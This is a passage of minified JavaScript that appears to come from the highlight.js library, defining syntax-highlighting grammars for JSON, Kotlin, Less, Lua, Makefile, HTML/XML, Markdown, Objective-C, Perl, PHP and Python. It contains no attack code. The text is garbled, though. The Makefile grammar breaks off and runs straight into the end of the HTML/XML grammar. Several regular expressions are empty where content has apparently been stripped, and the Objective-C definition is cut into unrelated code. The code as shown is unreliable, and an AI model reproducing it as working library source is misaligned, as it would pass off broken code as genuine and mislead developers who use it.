else",relevance:0},{begin:["(?:"+a+"\\s+)",e.UNDERSCORE_IDENT_RE,/\s*(?=\()/],className:{2:"title.function"},keywords:i,contains:[{className:"params",begin:/\(/,end:/\)/,keywords:i,relevance:0,contains:[r,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,er,e.C_BLOCK_COMMENT_MODE,]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},er,r,]}},grmr_javascript:em,grmr_json(e){let n=["true","false","null"],t={scope:"literal",beginKeywords:n.join(" ")};return{name:"JSON",keywords:{literal:n},contains:[{className:"attr",begin:/"(\\.|[^\\"\r\n])*"(?=\s*:)/,relevance:1.01},{match:/[{}[\],:]/,className:"punctuation",relevance:0},e.QUOTE_STRING_MODE,t,e.C_NUMBER_MODE,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,],illegal:"\\S"}},grmr_kotlin(e){let n={keyword:"abstract as val var vararg get set class object open private protected public noinline crossinline dynamic final enum if else do while for when throw try catch finally import package is in fun override companion reified inline lateinit init interface annotation data sealed internal infix operator out by constructor super tailrec where const inner suspend typealias external expect actual",built_in:"Byte Short Char Int Long Boolean Float Double Void Unit Nothing",literal:"true false null"},t={className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"@"},a={className:"subst",begin:/\$\{/,end:/\}/,contains:[e.C_NUMBER_MODE]},i={className:"variable",begin:"\\$"+e.UNDERSCORE_IDENT_RE},r={className:"string",variants:[{begin:'"""',end:'"""(?=[^"])',contains:[i,a]},{begin:"'",end:"'",illegal:/\n/,contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"',illegal:/\n/,contains:[e.BACKSLASH_ESCAPE,i,a]},]};a.contains.push(r);let s={className:"meta",begin:"@(?:file|property|field|get|set|receiver|param|setparam|delegate)\\s*:(?:\\s*"+e.UNDERSCORE_IDENT_RE+")?"},l={className:"meta",begin:"@"+e.UNDERSCORE_IDENT_RE,contains:[{begin:/\(/,end:/\)/,contains:[e.inherit(r,{className:"string"}),"self"]},]},o=e.COMMENT("/\\*","\\*/",{contains:[e.C_BLOCK_COMMENT_MODE]}),c={variants:[{className:"type",begin:e.UNDERSCORE_IDENT_RE},{begin:/\(/,end:/\)/,contains:[]},]},d=c;return d.variants[1].contains=[c],c.variants[1].contains=[d],{name:"Kotlin",aliases:["kt","kts"],keywords:n,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,o,{className:"keyword",begin:/\b(break|continue|return|this)\b/,starts:{contains:[{className:"symbol",begin:/@\w+/}]}},t,s,l,{className:"function",beginKeywords:"fun",end:"[(]|$",returnBegin:!0,excludeEnd:!0,keywords:n,relevance:5,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"type",begin://,keywords:"reified",relevance:0},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:n,relevance:0,contains:[{begin:/:/,end:/[=,\/]/,endsWithParent:!0,contains:[c,e.C_LINE_COMMENT_MODE,o],relevance:0},e.C_LINE_COMMENT_MODE,o,s,l,r,e.C_NUMBER_MODE,]},o,]},{begin:[/class|interface|trait/,/\s+/,e.UNDERSCORE_IDENT_RE],beginScope:{3:"title.class"},keywords:"class interface trait",end:/[:\{(]|$/,excludeEnd:!0,illegal:"extends implements",contains:[{beginKeywords:"public protected internal private constructor"},e.UNDERSCORE_TITLE_MODE,{className:"type",begin://,excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:/[,:]\s*/,end:/[<\(,){\s]|$/,excludeBegin:!0,returnEnd:!0},s,l,]},r,{className:"meta",begin:"^#!/usr/bin/env",end:"$",illegal:"\n"},er,]}},grmr_less(e){let n=X(e),t="([\\w-]+|@\\{[\\w-]+\\})",a=[],i=[],r=e=>({className:"string",begin:"~?"+e+".*?"+e}),s=(e,n,t)=>({className:e,begin:n,relevance:t}),l={$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")};i.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,r("'"),r('"'),n.CSS_NUMBER_MODE,{begin:"(url|data-uri)\\(",starts:{className:"string",end:"[\\)\\n]",excludeEnd:!0}},n.HEXCOLOR,{begin:"\\(",end:"\\)",contains:i,keywords:l,relevance:0},s("variable","@@?[\\w-]+",10),s("variable","@\\{[\\w-]+\\}"),s("built_in","~?`[^`]*?`"),{className:"attribute",begin:"[\\w-]+\\s*:",end:":",returnBegin:!0,excludeEnd:!0},n.IMPORTANT,{beginKeywords:"and not"},n.FUNCTION_DISPATCH);let o=i.concat({begin:/\{/,end:/\}/,contains:a}),c={beginKeywords:"when",endsWithParent:!0,contains:[{beginKeywords:"and not"}].concat(i)},d={begin:t+"\\s*:",returnBegin:!0,end:/[;}]/,relevance:0,contains:[{begin:/-(webkit|moz|ms|o)-/},n.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b",end:/(?=:)/,starts:{endsWithParent:!0,illegal:"[<=$]",relevance:0,contains:i}},]},g={variants:[{begin:"[\\.#:&\\[>]",end:"[;{}]"},{begin:t,end:/\{/},],returnBegin:!0,returnEnd:!0,illegal:"[<='$\"]",relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,c,s("keyword","all\\b"),s("variable","@\\{[\\w-]+\\}"),{begin:"\\b("+V.join("|")+")\\b",className:"selector-tag"},n.CSS_NUMBER_MODE,s("selector-tag",t,0),s("selector-id","#"+t),s("selector-class","\\."+t,0),s("selector-tag","&",0),n.ATTRIBUTE_SELECTOR_MODE,{className:"selector-pseudo",begin:":("+Y.join("|")+")"},{className:"selector-pseudo",begin:":(:)?("+ee.join("|")+")"},{begin:/\(/,end:/\)/,relevance:0,contains:o},{begin:"!important"},n.FUNCTION_DISPATCH,]},u={begin:`[\\w-]+:(:)?(${et.join("|")})`,returnBegin:!0,contains:[g]};return a.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"keyword",begin:"@(import|media|charset|font-face|(-[a-z]+-)?keyframes|supports|document|namespace|page|viewport|host)\\b",starts:{end:"[;{}]",keywords:l,returnEnd:!0,contains:i,relevance:0}},{className:"variable",variants:[{begin:"@[\\w-]+\\s*:",relevance:15},{begin:"@[\\w-]+"},],starts:{end:"[;}]",returnEnd:!0,contains:o}},u,d,g,c,n.FUNCTION_DISPATCH),{name:"Less",case_insensitive:!0,illegal:"[=>'/<($\"]",contains:a}},grmr_lua(e){let n="\\[=*\\[",t="\\]=*\\]",a={begin:n,end:t,contains:["self"]},i=[e.COMMENT("--(?!\\[=*\\[)","$"),e.COMMENT("--\\[=*\\[",t,{contains:[a],relevance:10}),];return{name:"Lua",keywords:{$pattern:e.UNDERSCORE_IDENT_RE,literal:"true false nil",keyword:"and break do else elseif end for goto if in local not or repeat return then until while",built_in:"_G _ENV _VERSION __index __newindex __mode __call __metatable __tostring __len __gc __add __sub __mul __div __mod __pow __concat __unm __eq __lt __le assert collectgarbage dofile error getfenv getmetatable ipairs load loadfile loadstring module next pairs pcall print rawequal rawget rawset require select setfenv setmetatable tonumber tostring type unpack xpcall arg self coroutine resume yield status wrap create running debug getupvalue debug sethook getmetatable gethook setmetatable setlocal traceback setfenv getinfo setupvalue getlocal getregistry getfenv io lines write close flush open output type read stderr stdin input stdout popen tmpfile math log max acos huge ldexp pi cos tanh pow deg tan cosh sinh random randomseed frexp ceil floor rad abs sqrt modf asin min mod fmod log10 atan2 exp sin atan os exit setlocale date getenv difftime remove time clock tmpname rename execute package preload loadlib loaded loaders cpath config path seeall string sub upper len gfind rep find match char dump gmatch reverse byte format gsub lower table setn insert getn foreachi maxn foreach concat sort remove"},contains:i.concat([{className:"function",beginKeywords:"function",end:"\\)",contains:[e.inherit(e.TITLE_MODE,{begin:"([_a-zA-Z]\\w*\\.)*([_a-zA-Z]\\w*:)?[_a-zA-Z]\\w*"}),{className:"params",begin:"\\(",endsWithParent:!0,contains:i},].concat(i)},e.C_NUMBER_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"string",begin:n,end:t,contains:[a],relevance:5},])}},grmr_makefile(e){let n={className:"variable",variants:[{begin:"\\$\\("+e.UNDERSCORE_IDENT_RE+"\\)",contains:[e.BACKSLASH_ESCAPE]},{begin:/\$[@%`]+/},]},]},]};return{name:"HTML, XML",aliases:["html","xhtml","rss","atom","xjb","xsd","xsl","plist","wsf","svg",],case_insensitive:!0,unicodeRegex:!0,contains:[{className:"meta",begin://,relevance:10,contains:[i,l,s,r,{begin:/\[/,end:/\]/,contains:[{className:"meta",begin://,contains:[i,r,l,s]},]},]},e.COMMENT(//,{relevance:10}),{begin://,relevance:10},a,{className:"meta",end:/\?>/,variants:[{begin:/<\?xml/,relevance:10,contains:[l]},{begin:/<\?[a-z][a-z0-9]+/},]},{className:"tag",begin:/)/,end:/>/,keywords:{name:"style"},contains:[o],starts:{end:/<\/style>/,returnEnd:!0,subLanguage:["css","xml"]}},{className:"tag",begin:/)/,end:/>/,keywords:{name:"script"},contains:[o],starts:{end:/<\/script>/,returnEnd:!0,subLanguage:["javascript","handlebars","xml"]}},{className:"tag",begin:/<>|<\/>/},{className:"tag",begin:n.concat(//,/>/,/\s/)))),end:/\/?>/,contains:[{className:"name",begin:t,relevance:0,starts:o},]},{className:"tag",begin:n.concat(/<\//,n.lookahead(n.concat(t,/>/))),contains:[{className:"name",begin:t,relevance:0},{begin:/>/,relevance:0,endsParent:!0},]},]}},grmr_markdown(e){let n={begin:/<\/?[A-Za-z_]/,end:">",subLanguage:"xml",relevance:0},t={variants:[{begin:/\[.+?\]\[.*?\]/,relevance:0},{begin:/\[.+?\]\(((data|javascript|mailto):|(?:http|ftp)s?:\/\/).*?\)/,relevance:2},{begin:e.regex.concat(/\[.+?\]\(/,/[A-Za-z][A-Za-z0-9+.-]*/,/:\/\/.*?\)/),relevance:2},{begin:/\[.+?\]\([./?&#].*?\)/,relevance:1},{begin:/\[.*?\]\(.*?\)/,relevance:0},],returnBegin:!0,contains:[{match:/\[(?=\])/},{className:"string",relevance:0,begin:"\\[",end:"\\]",excludeBegin:!0,returnEnd:!0},{className:"link",relevance:0,begin:"\\]\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0},{className:"symbol",relevance:0,begin:"\\]\\[",end:"\\]",excludeBegin:!0,excludeEnd:!0},]},a={className:"strong",contains:[],variants:[{begin:/_{2}(?!\s)/,end:/_{2}/},{begin:/\*{2}(?!\s)/,end:/\*{2}/},]},i={className:"emphasis",contains:[],variants:[{begin:/\*(?![*\s])/,end:/\*/},{begin:/_(?![_\s])/,end:/_/,relevance:0},]},r=e.inherit(a,{contains:[]}),s=e.inherit(i,{contains:[]});a.contains.push(s),i.contains.push(r);let l=[n,t];return[a,i,r,s].forEach(e=>{e.contains=e.contains.concat(l)}),{name:"Markdown",aliases:["md","mkdown","mkd"],contains:[{className:"section",variants:[{begin:"^#{1,6}",end:"$",contains:l=l.concat(a,i)},{begin:"(?=^.+?\\n[=-]{2,}$)",contains:[{begin:"^[=-]*$"},{begin:"^",end:"\\n",contains:l},]},]},n,{className:"bullet",begin:"^[ ]*([*+-]|(\\d+\\.))(?=\\s+)",end:"\\s+",excludeEnd:!0},a,i,{className:"quote",begin:"^>\\s+",contains:l,end:"$"},{className:"code",variants:[{begin:"(`{3,})[^`](.|\\n)*?\\1`*[ ]*"},{begin:"(~{3,})[^~](.|\\n)*?\\1~*[ ]*"},{begin:"```",end:"```+[ ]*$"},{begin:"~~~",end:"~~~+[ ]*$"},{begin:"`.+?`"},{begin:"(?=^( {4}|\\t))",contains:[{begin:"^( {4}|\\t)",end:"(\\n)$"}],relevance:0},]},{begin:"^[-\\*]{3,}",end:"$"},t,{begin:/^\[[^\n]+\]:/,returnBegin:!0,contains:[{className:"symbol",begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0},{className:"link",begin:/:\s*/,end:/$/,excludeBegin:!0},]},]}},grmr_objectivec(e){let n=/[a-zA-Z@][a-zA-Z0-9_]*/,t={$pattern:n,keyword:["@interface","@class","@protocol","@implementation"]};return{name:"Objective-C",aliases:["mm","objc","obj-c","obj-c++","objective-c++"],keywords:{"variable.language":["this","super"],$pattern:n,keyword:["while","export","sizeof","typedef","const","struct","for","union","volatile","static","mutable","if","do","return","goto","enum","else","break","extern","asm","case","default","register","explicit","typename","switch","continue","inline","readonly","assign","readwrite","self","@synchronized","id","typeof","nonatomic","IBOutlet","IBAction","strong","weak","copy","in","out","inout","bycopy","byref","oneway","__strong","__weak","__block","__autoreleasing","@private","@protected","@public","@try","@property","@end","@throw","@catch","@finally","@autoreleasepool","@synthesize","@dynamic","@selector","@optional","@required","@encode","@package","@import","@defs","@compatibility_alias","__bridge","__bridge_transfer","__bridge_retained","__bridge_retain","__covariant","__contravariant","__kindof","_Nonnull","_Nullable","_Null_unspecified","__FUNCTION__","__PRETTY_FUNCTION__","__attribute__","getter","setter","retain","unsafe_unretained","nonnull","nullable","null_unspecified","null_resettable","class","instancetype","NS_DESIGNATED_INITIALIZER","NS_UNAVAILABLE","NS_REQUIRES_SUPER","NS_RETURNS_INNER_POINTER","NS_INLINE","NS_AVAILABLE","NS_DEPRECATED","NS_ENUM","NS_OPTIONS","NS_SWIFT_UNAVAILABLE","NS_ASSUME_NONNULL_BEGIN","NS_ASSUME_NONNULL_END","NS_REFINED_FOR_SWIFT","NS_SWIFT_NAME","NS_SWIFT_NOTHROW","NS_DURING","NS_HANDLER","NS_ENDHANDLER","NS_VALUERETURN","NS_VOIDRETURN",],literal:["false","true","FALSE","TRUE","nil","YES","NO","NULL",],built_in:["dispatch_once_t","dispatch_queue_t","dispatch_sync","dispatch_async","dispatch_once",],type:["int","float","char","unsigned","signed","short","long","double","wchar_t","unichar","void","bool","BOOL","id|0","_Bool",]},illegal:"/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},{className:"class",begin:"("+t.keyword.join("|")+")\\b",end:/(\{|$)/,excludeEnd:!0,keywords:t,contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"\\."+e.UNDERSCORE_IDENT_RE,relevance:0},]}},grmr_perl(e){let n=e.regex,t=/[dualxmsipngr]{0,12}/,a={$pattern:/[\w.]+/,keyword:"abs accept alarm and atan2 bind binmode bless break caller chdir chmod chomp chop chown chr chroot close closedir connect continue cos crypt dbmclose dbmopen defined delete die do dump each else elsif endgrent endhostent endnetent endprotoent endpwent endservent eof eval exec exists exit exp fcntl fileno flock for foreach fork format formline getc getgrent getgrgid getgrnam gethostbyaddr gethostbyname gethostent getlogin getnetbyaddr getnetbyname getnetent getpeername getpgrp getpriority getprotobyname getprotobynumber getprotoent getpwent getpwnam getpwuid getservbyname getservbyport getservent getsockname getsockopt given glob gmtime goto grep gt hex if index int ioctl join keys kill last lc lcfirst length link listen local localtime log lstat lt ma map mkdir msgctl msgget msgrcv msgsnd my ne next no not oct open opendir or ord our pack package pipe pop pos print printf prototype push q|0 qq quotemeta qw qx rand read readdir readline readlink readpipe recv redo ref rename require reset return reverse rewinddir rindex rmdir say scalar seek seekdir select semctl semget semop send setgrent sethostent setnetent setpgrp setpriority setprotoent setpwent setservent setsockopt shift shmctl shmget shmread shmwrite shutdown sin sleep socket socketpair sort splice split sprintf sqrt srand stat state study sub substr symlink syscall sysopen sysread sysseek system syswrite tell telldir tie tied time times tr truncate uc ucfirst umask undef unless unlink unpack unshift untie until use utime values vec wait waitpid wantarray warn when while write x|0 xor y|0"},i={className:"subst",begin:"[$@]\\{",end:"\\}",keywords:a},r={begin:/->\{/,end:/\}/},s={variants:[{begin:/\$\d/},{begin:n.concat(/[$%@](\^\w\b|#\w+(::\w+)*|\{\w+\}|\w+(::\w*)*)/,"(?![A-Za-z])(?![@$%])")},{begin:/[$%@][^\s\w{]/,relevance:0},]},l=[e.BACKSLASH_ESCAPE,i,s],o=[/!/,/\//,/\|/,/\?/,/'/,/"/,/#/],c=(e,a,i="\\1")=>{let r="\\1"===i?i:n.concat(i,a);return n.concat(n.concat("(?:",e,")"),a,/(?:\\.|[^\\\/])*?/,r,/(?:\\.|[^\\\/])*?/,i,t)},d=(e,a,i)=>n.concat(n.concat("(?:",e,")"),a,/(?:\\.|[^\\\/])*?/,i,t),g=[s,e.HASH_COMMENT_MODE,e.COMMENT(/^=\w/,/=cut/,{endsWithParent:!0}),r,{className:"string",contains:l,variants:[{begin:"q[qwxr]?\\s*\\(",end:"\\)",relevance:5},{begin:"q[qwxr]?\\s*\\[",end:"\\]",relevance:5},{begin:"q[qwxr]?\\s*\\{",end:"\\}",relevance:5},{begin:"q[qwxr]?\\s*\\|",end:"\\|",relevance:5},{begin:"q[qwxr]?\\s*<",end:">",relevance:5},{begin:"qw\\s+q",end:"q",relevance:5},{begin:"'",end:"'",contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"'},{begin:"`",end:"`",contains:[e.BACKSLASH_ESCAPE]},{begin:/\{\w+\}/,relevance:0},{begin:"-?\\w+\\s*=>",relevance:0},]},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\/\\/|"+e.RE_STARTERS_RE+"|\\b(split|return|print|reverse|grep)\\b)\\s*",keywords:"split return print reverse grep",relevance:0,contains:[e.HASH_COMMENT_MODE,{className:"regexp",variants:[{begin:c("s|tr|y",n.either(...o,{capture:!0}))},{begin:c("s|tr|y","\\(","\\)")},{begin:c("s|tr|y","\\[","\\]")},{begin:c("s|tr|y","\\{","\\}")},],relevance:2},{className:"regexp",variants:[{begin:/(m|qr)\/\//,relevance:0},{begin:d("(?:m|qr)?",/\//,/\//)},{begin:d("m|qr",n.either(...o,{capture:!0}),/\1/)},{begin:d("m|qr",/\(/,/\)/)},{begin:d("m|qr",/\[/,/\]/)},{begin:d("m|qr",/\{/,/\}/)},]},]},{className:"function",beginKeywords:"sub",end:"(\\s*\\(.*?\\))?[;{]",excludeEnd:!0,relevance:5,contains:[e.TITLE_MODE]},{begin:"-\\w\\b",relevance:0},{begin:"^__DATA__$",end:"^__END__$",subLanguage:"mojolicious",contains:[{begin:"^@@.*",end:"$",className:"comment"}]},];return i.contains=g,r.contains=g,{name:"Perl",aliases:["pl","pm"],keywords:a,contains:g}},grmr_php(e){let n=e.regex,t=/(?![A-Za-z0-9])(?![$])/,a=n.concat(/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/,t),i=n.concat(/(\\?[A-Z][a-z0-9_\x7f-\xff]+|\\?[A-Z]+(?=[A-Z][a-z0-9_\x7f-\xff])){1,}/,t),r={scope:"variable",match:"\\$+"+a},s={scope:"subst",variants:[{begin:/\$\w+/},{begin:/\{\$/,end:/\}/},]},l=e.inherit(e.APOS_STRING_MODE,{illegal:null}),o="[ \n]",c={scope:"string",variants:[e.inherit(e.QUOTE_STRING_MODE,{illegal:null,contains:e.QUOTE_STRING_MODE.contains.concat(s)}),l,e.END_SAME_AS_BEGIN({begin:/<<<[ \t]*(\w+)\n/,end:/[ \t]*(\w+)\b/,contains:e.QUOTE_STRING_MODE.contains.concat(s)}),]},d={scope:"number",variants:[{begin:"\\b0[bB][01]+(?:_[01]+)*\\b"},{begin:"\\b0[oO][0-7]+(?:_[0-7]+)*\\b"},{begin:"\\b0[xX][\\da-fA-F]+(?:_[\\da-fA-F]+)*\\b"},{begin:"(?:\\b\\d+(?:_\\d+)*(\\.(?:\\d+(?:_\\d+)*))?|\\B\\.\\d+)(?:[eE][+-]?\\d+)?"},],relevance:0},g=["false","null","true"],u=["__CLASS__","__DIR__","__FILE__","__FUNCTION__","__COMPILER_HALT_OFFSET__","__LINE__","__METHOD__","__NAMESPACE__","__TRAIT__","die","echo","exit","include","include_once","print","require","require_once","array","abstract","and","as","binary","bool","boolean","break","callable","case","catch","class","clone","const","continue","declare","default","do","double","else","elseif","empty","enddeclare","endfor","endforeach","endif","endswitch","endwhile","enum","eval","extends","final","finally","float","for","foreach","from","global","goto","if","implements","instanceof","insteadof","int","integer","interface","isset","iterable","list","match|0","mixed","new","never","object","or","private","protected","public","readonly","real","return","string","switch","throw","trait","try","unset","use","var","void","while","xor","yield",],b=["Error|0","AppendIterator","ArgumentCountError","ArithmeticError","ArrayIterator","ArrayObject","AssertionError","BadFunctionCallException","BadMethodCallException","CachingIterator","CallbackFilterIterator","CompileError","Countable","DirectoryIterator","DivisionByZeroError","DomainException","EmptyIterator","ErrorException","Exception","FilesystemIterator","FilterIterator","GlobIterator","InfiniteIterator","InvalidArgumentException","IteratorIterator","LengthException","LimitIterator","LogicException","MultipleIterator","NoRewindIterator","OutOfBoundsException","OutOfRangeException","OuterIterator","OverflowException","ParentIterator","ParseError","RangeException","RecursiveArrayIterator","RecursiveCachingIterator","RecursiveCallbackFilterIterator","RecursiveDirectoryIterator","RecursiveFilterIterator","RecursiveIterator","RecursiveIteratorIterator","RecursiveRegexIterator","RecursiveTreeIterator","RegexIterator","RuntimeException","SeekableIterator","SplDoublyLinkedList","SplFileInfo","SplFileObject","SplFixedArray","SplHeap","SplMaxHeap","SplMinHeap","SplObjectStorage","SplObserver","SplPriorityQueue","SplQueue","SplStack","SplSubject","SplTempFileObject","TypeError","UnderflowException","UnexpectedValueException","UnhandledMatchError","ArrayAccess","BackedEnum","Closure","Fiber","Generator","Iterator","IteratorAggregate","Serializable","Stringable","Throwable","Traversable","UnitEnum","WeakReference","WeakMap","Directory","__PHP_Incomplete_Class","parent","php_user_filter","self","static","stdClass",],m={keyword:u,literal:(e=>{let n=[];return e.forEach(e=>{n.push(e),e.toLowerCase()===e?n.push(e.toUpperCase()):n.push(e.toLowerCase())}),n})(g),built_in:b},p=e=>e.map(e=>e.replace(/\|\d+$/,"")),h={variants:[{match:[/new/,n.concat(o,"+"),n.concat("(?!",p(b).join("\\b|"),"\\b)"),i,],scope:{1:"keyword",4:"title.class"}},]},f=n.concat(a,"\\b(?!\\()"),E={variants:[{match:[n.concat(/::/,n.lookahead(/(?!class\b)/)),f],scope:{2:"variable.constant"}},{match:[/::/,/class/],scope:{2:"variable.language"}},{match:[i,n.concat(/::/,n.lookahead(/(?!class\b)/)),f],scope:{1:"title.class",3:"variable.constant"}},{match:[i,n.concat("::",n.lookahead(/(?!class\b)/))],scope:{1:"title.class"}},{match:[i,/::/,/class/],scope:{1:"title.class",3:"variable.language"}},]},$={scope:"attr",match:n.concat(a,n.lookahead(":"),n.lookahead(/(?!::)/))},y={relevance:0,begin:/\(/,end:/\)/,keywords:m,contains:[$,r,E,e.C_BLOCK_COMMENT_MODE,c,d,h]},N={relevance:0,match:[/\b/,n.concat("(?!fn\\b|function\\b|",p(u).join("\\b|"),"|",p(b).join("\\b|"),"\\b)"),a,n.concat(o,"*"),n.lookahead(/(?=\()/),],scope:{3:"title.function.invoke"},contains:[y]};y.contains.push(N);let w=[$,E,e.C_BLOCK_COMMENT_MODE,c,d,h];return{case_insensitive:!1,keywords:m,contains:[{begin:n.concat(/#\[\s*/,i),beginScope:"meta",end:/]/,endScope:"meta",keywords:{literal:g,keyword:["new","array"]},contains:[{begin:/\[/,end:/]/,keywords:{literal:g,keyword:["new","array"]},contains:["self",...w]},...w,{scope:"meta",match:i},]},e.HASH_COMMENT_MODE,e.COMMENT("//","$"),e.COMMENT("/\\*","\\*/",{contains:[{scope:"doctag",match:"@[A-Za-z]+"},]}),{match:/__halt_compiler\(\);/,keywords:"__halt_compiler",starts:{scope:"comment",end:e.MATCH_NOTHING_RE,contains:[{match:/\?>/,scope:"meta",endsParent:!0}]}},{scope:"meta",variants:[{begin:/<\?php/,relevance:10},{begin:/<\?=/},{begin:/<\?/,relevance:.1},{begin:/\?>/},]},{scope:"variable.language",match:/\$this\b/},r,N,E,{match:[/const/,/\s/,a],scope:{1:"keyword",3:"variable.constant"}},h,{scope:"function",relevance:0,beginKeywords:"fn function",end:/[;{]/,excludeEnd:!0,illegal:"[$%\\[]",contains:[{beginKeywords:"use"},e.UNDERSCORE_TITLE_MODE,{begin:"=>",endsParent:!0},{scope:"params",begin:"\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0,keywords:m,contains:["self",r,E,e.C_BLOCK_COMMENT_MODE,c,d]},]},{scope:"class",variants:[{beginKeywords:"enum",illegal:/[($"]/},{beginKeywords:"class interface trait",illegal:/[:($"]/},],relevance:0,end:/\{/,excludeEnd:!0,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE,]},{beginKeywords:"namespace",relevance:0,end:";",illegal:/[.']/,contains:[e.inherit(e.UNDERSCORE_TITLE_MODE,{scope:"title.class"}),]},{beginKeywords:"use",relevance:0,end:";",contains:[{match:/\b(as|const|function)\b/,scope:"keyword"},e.UNDERSCORE_TITLE_MODE,]},c,d,]}},grmr_php_template:e=>({name:"PHP template",subLanguage:"xml",contains:[{begin:/<\?(php|=)?/,end:/\?>/,subLanguage:"php",contains:[{begin:"/\\*",end:"\\*/",skip:!0},{begin:'b"',end:'"',skip:!0},{begin:"b'",end:"'",skip:!0},e.inherit(e.APOS_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),e.inherit(e.QUOTE_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),]},]}),grmr_plaintext:e=>({name:"Plain text",aliases:["text","txt"],disableAutodetect:!0}),grmr_python(e){let n=e.regex,t=/[\p{XID_Start}_]\p{XID_Continue}*/u,a=["and","as","assert","async","await","break","case","class","continue","def","del","elif","else","except","finally","for","from","global","if","import","in","is","lambda","match","nonlocal|10","not","or","pass","raise","return","try","while","with","yield",],i={$pattern:/[A-Za-z]\w+|__\w+__/,keyword:a,built_in:["__import__","abs","all","any","ascii","bin","bool","breakpoint","bytearray","bytes","callable","chr","classmethod","compile","complex","delattr","dict","dir","divmod","enumerate","eval","exec","filter","float","format","frozenset","getattr","globals","hasattr","hash","help","hex","id","input","int","isinstance","issubclass","iter","len","list","locals","map","max","memoryview","min","next","object","oct","open","ord","pow","print","property","range","repr","reversed","round","set","setattr","slice","sorted","staticmethod","str","sum","super","tuple","type","vars","zip",],literal:["__debug__","Ellipsis","False","None","NotImplemented","True",],type:["Any","Callable","Coroutine","Dict","List","Literal","Generic","Optional","Sequence","Set","Tuple","Type","Union",]},r={className:"meta",begin:/^(>>>|\.\.\.) /},s={className:"subst",begin:/\{/,end:/\}/,keywords:i,illegal:/#/},l={begin:/\{\{/,relevance:0},o={className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:/([uU]|[bB]|[rR]|[bB][rR]|[rR][bB])?'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,r],relevance:10},{begin:/([uU]|[bB]|[rR]|[bB][rR]|[rR][bB])?"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,r],relevance:10},{begin:/([fF][rR]|[rR][fF]|[fF])'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,r,l,s]},{begin:/([fF][rR]|[rR][fF]|[fF])"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,r,l,s]},{begin:/([uU]|[rR])'/,end:/'/,relevance:10},{begin:/([uU]|[rR])"/,end:/"/,relevance:10},{begin:/([bB]|[bB][rR]|[rR][bB])'/,end:/'/},{begin:/([bB]|[bB][rR]|[rR][bB])"/,end:/"/},{begin:/([fF][rR]|[rR][fF]|[fF])'/,end:/'/,contains:[e.BACKSLASH_ESCAPE,l,s]},{begin:/([fF][rR]|[rR][fF]|[fF])"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,l,s]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,]},c="[0-9](_?[0-9])*",d=`(\\b(${c}))?\\.(${c})|\\b(${c})\\.`,g="\\b|"+a.join("|"),u={className:"number",relevance:0,variants:[{begin:`(\\b(${c})|(${d}))[eE][+-]?(${c})[jJ]?(?=${g})`},{begin:`(${d})[jJ]?`},{begin:`\\b([1-9](_?[0-9])*|0+(_?0)*)[lLjJ]?(?=${g})`},{begin:`\\b0[bB](_?[01])+[lL]?(?=${g})`},{begin:`\\b0[oO](_?[0-7])+[lL]?(?=${g})`},{begin:`\\b0[xX](_?[0-9a-fA-F])+[lL]?(?=${g})`},{begin:`\\b(${c})[jJ](?=${g})`},]},b={className:"comment",begin:n.lookahead(/# type:/),end:/$/,keywords:i,contains:[{begin:/# type:/},{begin:/#/,end:/\b\B/,endsWithParent:!0},]},m={className:"params",variants:[{className:"",begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:i,contains:["self",r,u,o,e.HASH_COMMENT_MODE]},]};return s.contains=[o,u,r],{name:"Python",aliases:["py","gyp","ipython"],unicodeRegex:!0,keywords:i,illegal:/(<\/|->|\?)|=>/,contains:[r,u,{begin:/\bself\b/},{beginKeywords:"if",relevance:0},o,b,e.HASH_COMMENT_MODE,{match:[/\bdef/,/\s+/,t],scope:{1:"keyword",3:"title.function"},contains:[m]},{variants:[{match:[/\bclass/,/\s+/,t,/\s*/,/\(\s*/,t,/\s*\)/]},{match:[/\bclass/,/\s+/,t]},],scope:{1:"keyword",3:"title.class",6:"title.class.inherited"}},{className:"meta",begin:/^[\t ]*@/,end:/(?=#)|$/,contains:[u,m,o]},]}},grmr_python_repl:e=>({aliases:["pycon"],contains:[{className:"meta.prompt",starts:{end:/ |$/,starts:{end:"$",subLanguage:"python"}},variants:[{begin:/^>>>(?=[ ]|$)/},{begin:/^\.\.\.(?=[ 